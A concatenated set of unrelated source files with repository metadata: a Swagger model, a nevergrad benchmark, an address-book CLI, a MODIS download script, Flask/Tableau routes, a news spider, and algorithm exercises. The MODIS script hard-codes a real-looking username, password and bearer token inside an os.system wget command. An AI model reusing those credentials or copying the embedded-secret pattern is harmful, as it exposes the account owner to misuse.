from swagger_client.models.tag import Tag # noqa: F401,E501
class LbSourceIpPersistenceProfile(object):
    """NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Maps python attribute name -> type name (used by the generic serializers).
    swagger_types = {
        'purge': 'str',
        'ha_persistence_mirroring_enabled': 'bool',
        'timeout': 'int'
    }
    # Maps python attribute name -> JSON key in the REST payload.
    attribute_map = {
        'purge': 'purge',
        'ha_persistence_mirroring_enabled': 'ha_persistence_mirroring_enabled',
        'timeout': 'timeout'
    }
    def __init__(self, purge='FULL', ha_persistence_mirroring_enabled=False, timeout=300):  # noqa: E501
        """LbSourceIpPersistenceProfile - a model defined in Swagger"""  # noqa: E501
        self._purge = None
        self._ha_persistence_mirroring_enabled = None
        self._timeout = None
        # No polymorphic subtypes for this model.
        self.discriminator = None
        # Only assign through the property setters so validation runs.
        if purge is not None:
            self.purge = purge
        if ha_persistence_mirroring_enabled is not None:
            self.ha_persistence_mirroring_enabled = ha_persistence_mirroring_enabled
        if timeout is not None:
            self.timeout = timeout
    @property
    def purge(self):
        """Gets the purge of this LbSourceIpPersistenceProfile.  # noqa: E501
        persistence purge setting  # noqa: E501
        :return: The purge of this LbSourceIpPersistenceProfile.  # noqa: E501
        :rtype: str
        """
        return self._purge
    @purge.setter
    def purge(self, purge):
        """Sets the purge of this LbSourceIpPersistenceProfile.
        persistence purge setting  # noqa: E501
        :param purge: The purge of this LbSourceIpPersistenceProfile.  # noqa: E501
        :type: str
        """
        # Validate against the enum declared in the NSX API spec.
        allowed_values = ["NO_PURGE", "FULL"]  # noqa: E501
        if purge not in allowed_values:
            raise ValueError(
                "Invalid value for `purge` ({0}), must be one of {1}"  # noqa: E501
                .format(purge, allowed_values)
            )
        self._purge = purge
    @property
    def ha_persistence_mirroring_enabled(self):
        """Gets the ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile.  # noqa: E501
        Persistence entries are not synchronized to the HA peer by default.  # noqa: E501
        :return: The ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile.  # noqa: E501
        :rtype: bool
        """
        return self._ha_persistence_mirroring_enabled
    @ha_persistence_mirroring_enabled.setter
    def ha_persistence_mirroring_enabled(self, ha_persistence_mirroring_enabled):
        """Sets the ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile.
        Persistence entries are not synchronized to the HA peer by default.  # noqa: E501
        :param ha_persistence_mirroring_enabled: The ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile.  # noqa: E501
        :type: bool
        """
        self._ha_persistence_mirroring_enabled = ha_persistence_mirroring_enabled
    @property
    def timeout(self):
        """Gets the timeout of this LbSourceIpPersistenceProfile.  # noqa: E501
        When all connections complete (reference count reaches 0), persistence entry timer is started with the expiration time.  # noqa: E501
        :return: The timeout of this LbSourceIpPersistenceProfile.  # noqa: E501
        :rtype: int
        """
        return self._timeout
    @timeout.setter
    def timeout(self, timeout):
        """Sets the timeout of this LbSourceIpPersistenceProfile.
        When all connections complete (reference count reaches 0), persistence entry timer is started with the expiration time.  # noqa: E501
        :param timeout: The timeout of this LbSourceIpPersistenceProfile.  # noqa: E501
        :type: int
        """
        # Spec constraint: timeout must be >= 1 second.
        if timeout is not None and timeout < 1:  # noqa: E501
            raise ValueError("Invalid value for `timeout`, must be a value greater than or equal to `1`")  # noqa: E501
        self._timeout = timeout
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Recursively serialize any model objects inside lists.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Recursively serialize model objects stored as dict values.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, LbSourceIpPersistenceProfile):
            return False
        # Generated equality: compare all instance attributes.
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"tcraft@pivotal.io"
] | tcraft@pivotal.io |
974266c40be29c89c2283e836d50a53fbe2b5395 | bee77315d08def61c1155930285211ef3d8d7654 | /nevergrad/functions/olympussurfaces/core.py | 978320088ddd141745feb7073f77e1a0df4ec471 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | facebookresearch/nevergrad | d2da592c1bf3b7c398392b3d39217a3753a4912c | daddb18184bf64ba9082ecc55a56e07429a23103 | refs/heads/main | 2023-09-04T10:53:42.903505 | 2023-08-30T17:10:37 | 2023-08-30T17:10:37 | 158,468,845 | 3,526 | 367 | MIT | 2023-09-11T13:37:36 | 2018-11-21T00:33:17 | Python | UTF-8 | Python | false | false | 4,355 | py | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Based on https://github.com/aspuru-guzik-group/olympus
import numpy as np
from functools import partial
from nevergrad.parametrization import parameter as p
from ..base import ExperimentFunction
import nevergrad as ng
class OlympusSurface(ExperimentFunction):
    """Synthetic Olympus benchmark surface with optional observation noise.

    The surface is evaluated at ``x - shift`` where ``shift`` is drawn at
    construction time, so the location of the optimum is randomized per
    instance and cannot be exploited by the optimizer.
    """

    # NOTE(review): "Michalewicz" appears twice in the upstream list; the
    # duplicate is kept so code that iterates over SURFACE_KINDS behaves
    # exactly as before.
    SURFACE_KINDS = (
        "Michalewicz",
        "AckleyPath",
        "Dejong",
        "HyperEllipsoid",
        "Levy",
        "Michalewicz",
        "Rastrigin",
        "Rosenbrock",
        "Schwefel",
        "StyblinskiTang",
        "Zakharov",
        "DiscreteAckley",
        "DiscreteDoubleWell",
        "DiscreteMichalewicz",
        "LinearFunnel",
        "NarrowFunnel",
        "GaussianMixture",
    )

    def __init__(
        self, kind: str, dimension: int = 10, noise_kind: str = "GaussianNoise", noise_scale: float = 1
    ) -> None:
        self.kind = kind
        self.param_dim = dimension
        self.noise_kind = noise_kind
        assert self.kind in OlympusSurface.SURFACE_KINDS
        assert self.noise_kind in ["GaussianNoise", "UniformNoise", "GammaNoise"]
        self.noise_scale = noise_scale
        # The noisy version is the optimization objective; the noiseless
        # version is used for the final (reproducible) evaluation.
        self.surface = partial(self._simulate_surface, noise=True)
        self.surface_without_noise = partial(self._simulate_surface, noise=False)
        parametrization = p.Array(shape=(dimension,))
        parametrization.function.deterministic = False
        super().__init__(self.surface, parametrization)
        self.shift = self.parametrization.random_state.normal(size=self.dimension)

    def _simulate_surface(self, x: np.ndarray, noise: bool = True) -> float:
        """Evaluate the (optionally noisy) surface at ``x``; the shift is applied here."""
        try:
            from olympus.surfaces import import_surface  # pylint: disable=import-outside-toplevel
            from olympus import noises
        except ImportError as e:
            raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
        if noise:
            noise = noises.Noise(kind=self.noise_kind, scale=self.noise_scale)
            surface = import_surface(self.kind)(param_dim=self.param_dim, noise=noise)
        else:
            surface = import_surface(self.kind)(param_dim=self.param_dim)
        return surface.run(x - self.shift)[0][0]

    def evaluation_function(self, *recommendations) -> float:
        """Return the noiseless loss of the first recommendation.

        Bug fix: ``_simulate_surface`` already subtracts ``self.shift``
        internally, so the original ``self.surface_without_noise(x - self.shift)``
        applied the shift twice, making the reported loss inconsistent with
        the optimized objective ``self.surface``.
        """
        x = recommendations[0].value
        return self.surface_without_noise(x)
class OlympusEmulator(ExperimentFunction):
    """Machine-learned emulator of an Olympus experimental dataset.

    The emulator predicts the measured objective for a given parameter
    vector; maximization goals are negated so the result is always a loss.
    """

    DATASETS = (
        "suzuki",
        "fullerenes",
        "colors_bob",
        "photo_wf3",
        "snar",
        "alkox",
        "benzylation",
        "photo_pce10",
        "hplc",
        "colors_n9",
    )

    def __init__(self, dataset_kind: str = "alkox", model_kind: str = "NeuralNet") -> None:
        self.dataset_kind = dataset_kind
        self.model_kind = model_kind
        assert self.dataset_kind in OlympusEmulator.DATASETS
        assert self.model_kind in ["BayesNeuralNet", "NeuralNet"]
        param = self._get_parametrization()
        param.function.deterministic = False
        param.set_name("")
        super().__init__(self._simulate_emulator, param)

    def _get_parametrization(self) -> p.Parameter:
        """Build the bounded array parametrization from the dataset's search space."""
        try:
            from olympus.datasets import Dataset  # pylint: disable=import-outside-toplevel
        except ImportError as e:
            raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
        dataset = Dataset(self.dataset_kind)
        # The last column of the dataset is the objective; the rest are parameters.
        dim = dataset.shape[1] - 1
        low, high = zip(*dataset.param_space.param_bounds)
        return p.Array(shape=(dim,), lower=low, upper=high)

    def _simulate_emulator(self, x: np.ndarray) -> float:
        """Run the emulator on ``x`` and return a loss (maximization goals negated)."""
        try:
            from olympus import Emulator  # pylint: disable=import-outside-toplevel
        except ImportError as e:
            raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
        emulator = Emulator(dataset=self.dataset_kind, model=self.model_kind)
        prediction = emulator.run(x)[0][0]
        sign = -1 if emulator.get_goal() == "maximize" else 1
        return prediction * sign
| [
"noreply@github.com"
] | facebookresearch.noreply@github.com |
6494aa421e2601435495170fd63e0de75337f754 | c917004bdd665903338c3115bd6821fc7208242b | /workspace/Python3_Lesson12/src/addressbook.py | 72c17c0ef0d93d7f176663ab385f23b973ae1786 | [] | no_license | paulrefalo/Python-2---4 | 408ad018ccc8161b801031f8d15df2154c5d25cb | 049c654ed626e97d7fe2f8dc61d84c60f10d7558 | refs/heads/master | 2021-01-10T05:30:25.502795 | 2016-02-19T02:08:39 | 2016-02-19T02:08:39 | 52,054,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,734 | py | import configparser
from optparse import OptionParser
import shelve
config = configparser.RawConfigParser()
# NOTE(review): the config path is hard-coded to a Windows drive letter;
# deriving it from __file__ would let the script run from other locations.
config.read('V:/workspace/Python3_Lesson12/src/addressbook.cfg')
# Location of the shelve database file, read from the [database] section.
shelf_location = config.get('database', 'file')
class InvalidEmail(Exception):
    """Raised when an email address fails validation."""
    pass


def validate_email(email):
    """Raise InvalidEmail unless *email* looks like an email address."""
    if '@' in email:
        return
    raise InvalidEmail("Invalid email: " + email)
def email_add(email):
    """Add *email* to the shelved address book.

    Returns an ``(ok, message)`` tuple describing the outcome.
    """
    validate_email(email)
    shelf = shelve.open(shelf_location)
    emails = shelf.get('emails', [])
    if email not in emails:
        emails.append(email)
        result = (True, 'Email "%s" added to address book' % email)
    else:
        result = (False, 'Email "%s" already in address book' % email)
    # Reassign so the shelf persists the change (writeback is off).
    shelf['emails'] = emails
    shelf.close()
    return result
def email_delete(email):
    """Remove *email* from the shelved address book.

    Returns an ``(ok, message)`` tuple describing the outcome.
    """
    validate_email(email)
    shelf = shelve.open(shelf_location)
    emails = shelf.get('emails', [])
    if email in emails:
        emails.remove(email)
        result = (True, 'Email "%s" removed from address book' % email)
    else:
        result = (False, 'Email "%s" was not in the address book' % email)
    # Reassign so the shelf persists the change (writeback is off).
    shelf['emails'] = emails
    shelf.close()
    return result
def email_display():
    """Return ``(True, text)`` where text lists every stored email, one per line."""
    shelf = shelve.open(shelf_location)
    # Robustness fix: .get avoids a KeyError when nothing was ever stored.
    emails = shelf.get('emails', [])
    shelf.close()
    # Idiom fix: join instead of repeated string concatenation in a loop.
    text = ''.join(email + '\n' for email in emails)
    return True, text
def main(options):
    """Route the parsed command-line options to the matching action.

    Returns the ``(ok, message)`` tuple of the chosen action, or None when
    no recognized action/display flag was given.
    """
    if options.action == 'add':
        return email_add(options.email)
    if options.action == 'delete':
        return email_delete(options.email)
    if options.display:
        return email_display()
if __name__ == '__main__':
    # Make sure the shelf file exists and holds an 'emails' list up front.
    shelf = shelve.open(shelf_location)
    if 'emails' not in shelf:
        shelf['emails'] = []
    shelf.close()
    parser = OptionParser()
    parser.add_option('-a', '--action', dest="action", action="store",
                      help="requires -e option. Actions: add/delete")
    parser.add_option('-e', '--email', dest="email",
                      action="store", help="email used in the -a option")
    parser.add_option('-d', '--display', dest="display", action="store_true",
                      help="show all emails")
    (options, args) = parser.parse_args()
    #validation: -a and -e must be given together
    if options.action and not options.email:
        parser.error("option -a requires option -e")
    elif options.email and not options.action:
        parser.error("option -e requires option -a")
    # NOTE(review): main() returns None when no valid action/display flag was
    # given, so the [1] subscription below would raise TypeError in that case.
    try:
        print(main(options)[1])
    except InvalidEmail:
        parser.error("option -e requires a valid email address")
"paul.refalo@gmail.com"
] | paul.refalo@gmail.com |
a76ce56f356f65611bcc9250aa5fdc250c9b10f9 | 0049832c5cbee4b96189b88b51653f48decde596 | /MODIS/MOD05/downloaderv2.py | eb85762e6a024cad9673678041edb0e2a034fbf1 | [] | no_license | henockmamo54/ImageFusion | 18cf27ec4a066456c0d575696fc986814d10a7e6 | 07e88b5cb1925f54b3b3659caa2abda2bf4f3a72 | refs/heads/master | 2023-06-16T12:38:07.352623 | 2021-07-19T00:52:02 | 2021-07-19T00:52:02 | 355,720,494 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 13 10:34:52 2021
@author: Henock
"""
import os
import modapsclient
from datetime import datetime
# SECURITY NOTE(review): credentials and an API bearer token are hard-coded
# in source control; they should be moved to environment variables or a
# config file and rotated.
username = "hiik324"
password = "Ecology123"

# Search window and bounding box (Cheorwon area) for the MODIS query.
startdate = "2019-08-01"
enddate = "2019-12-01"
north = "38.22346787684907"
south = "38.18195837298332"
west = "127.21710138948873"
east = "127.27222505323994"
product = "MOD05_L2"
collection = "61"

# Download files into a directory named after the start year.
startdate_obj = datetime.strptime(startdate, '%Y-%m-%d')
path = os.path.join("./", str(startdate_obj.year))
if not os.path.exists(path):
    os.mkdir(path)

a = modapsclient.ModapsClient()
products = a.searchForFiles(products=product, startTime=startdate,
                            endTime=enddate, north=north, south=south,
                            west=west, east=east, collection=collection)
print("Products count = > ", len(products))
for p in products:
    url = a.getFileUrls(p)[0]
    print(p, url)
    # Consistency fix: use the username/password variables instead of the
    # duplicated string literals, so changing credentials in one place is
    # enough.  The resulting command line is unchanged.
    # SECURITY: the URL is interpolated into a shell command; os.system is
    # kept for behavioral compatibility, but subprocess.run with an argument
    # list would avoid shell-injection risk.
    cmd = ('wget --user {0} --password {1} {2} --header "Authorization: Bearer C88B2F44-881A-11E9-B4DB-D7883D88392C" -P {3} '
           .format(username, password, url, path))
    os.system(cmd)
| [
"henockmamo54@gmail.com"
] | henockmamo54@gmail.com |
db6863c444c7ed992ab0de7afba38e1d1466433d | 0d982772c792460c3f09da170fe80b67336bd5c5 | /nsweb/controllers/analyze.py | 83611ce625aa5f6c1c62ff9f7402e909bdacada6 | [] | no_license | tziembo/neurosynth-web | bf31c3d66fe78fc908778857ebc500440a022f2e | 8642e490ab910665d8be9b3271260dec59e0c4b2 | refs/heads/master | 2021-06-27T05:50:56.512331 | 2017-08-22T05:46:51 | 2017-08-22T05:46:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,004 | py | from flask import Blueprint, render_template, redirect, url_for, request, jsonify, abort, send_file
from nsweb.models.analyses import Analysis, AnalysisImage
from nsweb.core import app, add_blueprint, db
from nsweb.initializers import settings
from nsweb.tasks import run_metaanalysis
from nsweb.controllers.images import send_nifti
from flask.helpers import url_for
import simplejson as json
from flask.ext.user import login_required, current_user
import re
import uuid
import requests
from os.path import join, basename, exists
import os
from datetime import datetime
from email.utils import parsedate
bp = Blueprint('analyze',__name__,url_prefix='/analyze')
@bp.route('/', methods=['GET'])
def index():
return render_template('analyze/index.html.slim')
@bp.route('/<id>/', methods=['GET', 'POST'])
def show(id):
return render_template('analyze/show.html.slim')
@login_required
def run():
if 'ids' not in request.args:
abort(404) # TODO: return sensible error message
result = run_metaanalysis.delay(request.args['ids']).wait()
if result:
# Create the Analysis record
uid = uuid.uuid4().hex
name = request.args.get('name', None)
description = request.args.get('description', None)
analysis = Analysis(name=request.args['name'], description=description,
uuid=uid, ip=request.remote_addr, user=current_user)
# Add images
image_dir = join(settings.IMAGE_DIR, 'analyses')
analysis.images = [
AnalysisImage(image_file=join(image_dir, name + '_pAgF_z_FDR_0.01.nii.gz'),
label='%s: forward inference' % name,
stat='z-score',
display=1,
download=1),
AnalysisImage(image_file=join(image_dir, name + '_pFgA_z_FDR_0.01.nii.gz'),
label='%s: reverse inference' % name,
stat='z-score',
display=1,
download=1)
]
db.session.add(analysis)
db.session.commit()
# Add studies
for s in ids:
db.session.add(Inclusion(analysis=analysis, study_id=int(s)))
db.session.commit()
@bp.route('/<id>/images')
### TODO: move image retrieval from multiple controllers into a separate helper
def get_images(id):
analysis = Analysis.query.filter_by(uuid=id).first()
if analysis is None:
abort(404)
images = [{
'id': img.id,
'name': img.label,
'colorPalette': 'red' if 'reverse' in img.label else 'blue',
# "intent": (img.stat + ':').capitalize(),
'url': '/images/%s' % img.id,
'visible': 1 if 'reverse' in img.label else 0,
'download': '/images/%s' % img.id,
'intent': 'z-score'
} for img in analysis.images if img.display]
return jsonify(data=images)
@bp.route('<id>/studies')
def get_studies(id):
analysis = Analysis.query.filter_by(uuid=id).first()
if analysis is None:
abort(404)
pass
| [
"tyarkoni@gmail.com"
] | tyarkoni@gmail.com |
2264537e226c42fd49c2db1e815b60de5324216e | eddb5cc6ece559a21fb2d99dc03fb4b9e3e1ddb0 | /fagaiwei/fagaiwei/spiders/41dagongwang_sipder.py | 5bd0eebebe50b1f5a487bf89305864a737b1af3a | [] | no_license | KKtoNN/python_spider | a9bdd005d607b1265a556cb4908e84804c0bfc62 | c72bd061c3ca4145fef85b0fd9c15576441cdb09 | refs/heads/master | 2020-03-18T22:50:00.131802 | 2018-05-30T00:47:56 | 2018-05-30T00:47:56 | 135,367,902 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,688 | py | # coding:utf-8
import re
import time
import scrapy
from fagaiwei.items import FagaiweiItem
from fagaiwei.settings import session, NewsItemInfo
from fagaiwei.keyword_others import keyword
class xiamenSipderSpider(scrapy.Spider):
name = 'dagongwang_sipder'
allowed_domains = ['takungpao.com']
start_urls = [
'http://news.takungpao.com/paper/list-{}.html'.format(time.strftime("%Y%m%d", time.localtime())),
]
def parse(self, response):
pub_title = '大公报'
data_tiitle = ''.join(list(response.xpath("//div[@class='pannel_inner01']/div//text()").getall())) \
.replace('/n', '')
web2 = 'http://news.takungpao.com.hk/paper/{}.html'.format(time.strftime("%Y%m%d", time.localtime()))
url2s = response.xpath("//a[@class ='bluelink']/text()").getall()
for url2 in url2s:
item = FagaiweiItem()
param = re.search(r'第(\w+)版', url2).group(1)
url = web2 + '?' + param
result = session.query(NewsItemInfo).filter_by(url=url, web_id=41).count()
if result:
# print("PDF 文件地址: {} 存在".format(url))
pass
else:
item['url'] = url
item['title'] = pub_title + data_tiitle + param
item['content'] = '该页面为电子版报纸请点原链接查看'
item['web'] = response.url
item['webname'] = pub_title
item['pub_time'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
item["keyword"] = keyword.get_keyword(item["content"])
item['web_id'] = 41
yield item
| [
"18835702864@163.com"
] | 18835702864@163.com |
3cdc5787adb3028825634d327fdb2d2aa36b91b5 | 5a61ba76c770de8469218ff457213e122e08c7d1 | /code/leetcode/dynamic_programming/Solution123.py | fc2166197c3a360720c261e79b56f0cb65a9bd9a | [
"Apache-2.0"
] | permissive | zhangrong1722/interview | 6a71af26f08f036a294e36073cb9eb6ca798b993 | 187a485de0774561eb843d8ee640236adda97b90 | refs/heads/master | 2020-09-06T08:15:00.229710 | 2019-12-10T06:32:05 | 2019-12-10T06:32:05 | 220,372,777 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | class Solution:
def maxProfit(self, prices):
"""
Considering the fact we may complete at most two transactions.We can assume that first transaction is finished at i-th element.
And we just need to cosider the subarry [:i] abd [i+1: lens],where the former and the latter represent the max value for subarray[:i] and subarray[i+1:len(prices)-1]
:type prices: List[int]
:rtype: int
reference: https://leetcode.com/problems/best-time-to-buy-and-sell-stock-iii/discuss/200126/simple-c%2B%2B-DP-beats-99.66-with-explanation
"""
if len(prices) <= 1:
return 0
left = [0] * len(prices)
right = [0] * len(prices)
min_prices, max_prices = prices[0], prices[-1]
for i in range(1, len(prices)):
min_prices = min(min_prices, prices[i])
left[i] = max(prices[i]-min_prices, left[i-1])
for j in range(len(prices)-2, -1, -1):
max_prices = max(max_prices, prices[j])
right[j] = max(max_prices - prices[j], right[j+1])
results = [left[i]+right[i] for i in range(len(prices))]
return max(results) | [
"1922525328@qq.com"
] | 1922525328@qq.com |
a6f026f02000c15a466f70505538d8d0d47501fc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02264/s889112571.py | 2e212a2e0961278eca5e971a4029146c58b8aed7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from collections import deque
def process_task(task,qua, elapsed_time, complete_task):
exe_task = task.popleft()
t = int(exe_task[1])
q = int(qua)
if t-q > 0:
exe_task[1] = (t - q)
task.append(exe_task)
elapsed_time += q
else:
elapsed_time += t
complete_task.append([exe_task[0], elapsed_time])
return elapsed_time,complete_task
def main():
n,q = map(int, raw_input().split())
task = [raw_input().split() for _ in range(n)]
que = deque(task)
ela_time = 0
comp_task = []
while len(que) != 0:
ela_time , comp_task= process_task(que, q, ela_time,comp_task)
for i in comp_task:
print i[0], i[1]
#def test():
if __name__ == '__main__':
main()
#test() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b540b5f7f786c6f93344f17dad5191ffb5aa943b | f1790e298bcbf7b26cacd3c27850f243c446b9eb | /courses/python3/ch4-POO/06_lesson/encapsulation.py | 4ef417bcf9d7cecb3c934a7fb024c8b3d3026c50 | [] | no_license | misa9999/python | 36001a1bf0eb842d00b010b02e05b01aa4dfac57 | 251c5226db1bfef4a8445b025f232a27a6924930 | refs/heads/master | 2023-03-04T16:25:48.610233 | 2021-02-22T21:37:51 | 2021-02-22T21:37:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | """
public, protected, private
_ private/protected (public _)
__ private (_classname__attributename)
"""
class DataBase:
def __init__(self):
self.__data = {}
@property
def data(self):
return self.__data
def insert_customer(self, id, name):
if 'customers' not in self.__data:
self.__data['customers'] = {id: name}
else:
self.__data['customers'].update({id: name})
def show_customers(self):
for id, name in self.__data['customers'].items():
print(id, name)
def delete_customer(self, id):
del self.__data['customers'][id]
bd = DataBase()
bd.insert_customer(1, 'misa')
bd.insert_customer(2, 'lucy')
bd.insert_customer(3, 'megumin')
print(bd.data)
# bd.show_customers()
| [
"yuukixasuna00@gmailcom"
] | yuukixasuna00@gmailcom |
94de939343ae164a3702f2bf9f858e30ffc66e50 | 9276d5905d0bd4b892bccc3f3f9218124c356e59 | /tableau_view_extractor/routes.py | 0cac2c256afb2d0b2268ccd4603eb019cadb2ca2 | [] | no_license | toddbirchard/tableau-extraction | 7de813d8c547b11df13166c4bb3962b071f36602 | 0bddb8f4afe32fbef3bb6ab2c0b0076f62ca6fc4 | refs/heads/master | 2023-04-06T14:55:40.738915 | 2023-03-19T15:34:11 | 2023-03-19T15:34:11 | 162,696,737 | 19 | 2 | null | 2020-05-16T06:27:53 | 2018-12-21T09:49:26 | Python | UTF-8 | Python | false | false | 3,029 | py | import pandas as pd
from flask import Blueprint, Markup
from flask import current_app as app
from flask import render_template, request
from flask_assets import Bundle, Environment
from . import database, tableau
home_blueprint = Blueprint(
"home", __name__, template_folder="templates", static_folder="static"
)
assets = Environment(app)
js = Bundle("js/*.js", filters="jsmin", output="dist/packed.js")
scss = Bundle("scss/*.scss", filters="libsass", output="dist/all.css")
assets.register("scss_all", scss)
assets.register("js_all", js)
scss.build(force=True, disable_cache=True)
js.build(force=True, disable_cache=True)
@home_blueprint.route("/nav.jinja2", methods=["GET"])
def nav():
"""Build nav before every template render."""
tableau_view_extractor = tableau.ExtractTableauView()
xml = tableau_view_extractor.initialize_tableau_request()
token = tableau_view_extractor.get_token(xml)
all_sites = tableau_view_extractor.list_sites(token)
return render_template("nav.jinja2", all_sites=all_sites)
@home_blueprint.route("/", methods=["GET", "POST"])
def entry():
"""Homepage which lists all available views."""
tableau_view_extractor = tableau.ExtractTableauView()
xml = tableau_view_extractor.initialize_tableau_request()
token = tableau_view_extractor.get_token(xml)
site_id = tableau_view_extractor.get_site(xml, "id")
site_name = tableau_view_extractor.get_site(xml, "contentUrl")
views = tableau_view_extractor.list_views(site_id, xml, token)
all_sites = tableau_view_extractor.list_sites(token)
site = tableau_view_extractor.get_site(xml)
return render_template(
"index.jinja2",
title="Here are your views.",
template="home-template",
views=views,
token=token,
xml=xml,
site_name=site_name,
site=site,
all_sites=all_sites,
)
@home_blueprint.route("/view", methods=["GET", "POST"])
def view():
"""Display a preview of a selected view."""
site = request.args.get("site")
xml = request.args.get("xml")
view = request.args.get("view")
token = request.args.get("token")
tableau_view_extractor = tableau.ExtractTableauView()
view_df = tableau_view_extractor.get_view(site, xml, view, token)
view_df.to_csv("application/static/data/view.csv")
return render_template(
"view.jinja2",
title="Your View",
template="home-template",
view=view,
token=token,
xml=xml,
site=site,
view_df=Markup(view_df.to_html(index=False)),
)
@home_blueprint.route("/export", methods=["GET", "POST"])
def export():
"""Export view to external database."""
view_df = pd.read_csv("application/static/data/view.csv")
view_df.to_sql(
name="temp",
con=database.engine,
if_exists="replace",
chunksize=50,
index=True,
)
return render_template(
"export.jinja2",
title="Success!",
template="success-template",
)
| [
"toddbirchard@gmail.com"
] | toddbirchard@gmail.com |
be580a0a5cb16a37c9dd6cee1362c8df71b77f7d | 4495b65528bd00824a97520dee7ce22a5555ce44 | /bin/dirprinter | 48a7311fdb5989a5e1f447feede2acdc73b0498a | [] | no_license | steder/txproject | f0e7a8e57fddc454f35bc62f8273f8fb0e37f5c9 | 928d8ff40bc1b60998f6123b1b1b78f10251bf00 | refs/heads/master | 2021-01-13T02:06:45.623511 | 2015-04-13T14:17:43 | 2015-04-13T14:17:43 | 3,346,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | #!/usr/bin/env python
#-*- mode: python -*-
"""dirprinter
Pretty prints directories like this:
Example:
$ dirprinter dirname
dirname/
|-- printer.py
`-- testdir/
|-- subdir/
|-- |-- test3.txt
|-- `-- test4.txt
|-- test1.txt
`-- test2.txt
"""
import sys
from txproject import printer
from txproject import scripts
parser = scripts.getDirprinterOptionsParser(__doc__)
options, args = parser.parse_args()
if len(args) != 1:
parser.error("requires a single directory name as an argument")
path = args[0]
printer.printDirectory(path)
| [
"steder@gmail.com"
] | steder@gmail.com | |
c804374672e41fb2e779de2aa60a61a57c0ea935 | b7341581abaf2fb50e10e14911cc579e606a23d2 | /sirius_sdk/agent/wallet/abstract/non_secrets.py | a47cd8e70608d744123c602ab0e69692772ca7e1 | [
"Apache-2.0"
] | permissive | GarlonHasham/sirius-sdk-python | 3e627af6c2b3ef641b27514787fb08d0e0b30808 | 715b12c910574d78502f186aa512bc1ef5b63fbc | refs/heads/master | 2023-05-14T03:56:29.141362 | 2021-06-03T10:42:01 | 2021-06-03T10:42:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,289 | py | import json
from abc import ABC, abstractmethod
from typing import Optional, List
from sirius_sdk.base import JsonSerializable
class RetrieveRecordOptions(JsonSerializable):
def __init__(self, retrieve_type: bool=False, retrieve_value: bool=False, retrieve_tags: bool=False):
self.retrieve_type = retrieve_type
self.retrieve_value = retrieve_value
self.retrieve_tags = retrieve_tags
def check_all(self):
self.retrieve_type = True
self.retrieve_value = True
self.retrieve_tags = True
def to_json(self):
options = dict()
if self.retrieve_type:
options['retrieveType'] = self.retrieve_type
if self.retrieve_value:
options['retrieveValue'] = self.retrieve_value
if self.retrieve_tags:
options['retrieveTags'] = self.retrieve_tags
return options
def serialize(self):
return json.dumps(self.to_json())
def deserialize(self, buffer: str):
data = json.loads(buffer)
self.retrieve_type = data.get('retrieveType', False)
self.retrieve_value = data.get('retrieveValue', False)
self.retrieve_tags = data.get('retrieveTags', False)
class AbstractNonSecrets(ABC):
    """Interface for non-secret (non-key) wallet record storage.

    Concrete wallet implementations provide async CRUD and search over
    typed, tagged records.  All methods are abstract.

    Fix note: the stubs previously did ``raise NotImplemented`` — that is
    the built-in *constant*, not an exception, and raising it produces a
    ``TypeError`` in Python 3.  ``NotImplementedError`` is the correct
    exception for unimplemented abstract methods.
    """

    @abstractmethod
    async def add_wallet_record(self, type_: str, id_: str, value: str, tags: dict=None) -> None:
        """
        Create a new non-secret record in the wallet.

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param value: the value of record
        :param tags: the record tags used for search and storing meta information as json:
           {
             "tagName1": <str>, // string tag (will be stored encrypted)
             "tagName2": <str>, // string tag (will be stored encrypted)
